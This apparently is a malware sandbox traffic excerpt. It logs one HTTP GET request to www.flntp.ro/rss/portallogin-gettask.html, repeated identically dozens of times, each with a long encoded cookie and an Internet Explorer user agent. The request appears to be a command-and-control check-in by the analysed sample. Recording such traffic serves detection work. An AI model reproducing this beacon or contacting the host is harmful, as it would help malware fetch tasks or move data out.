      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
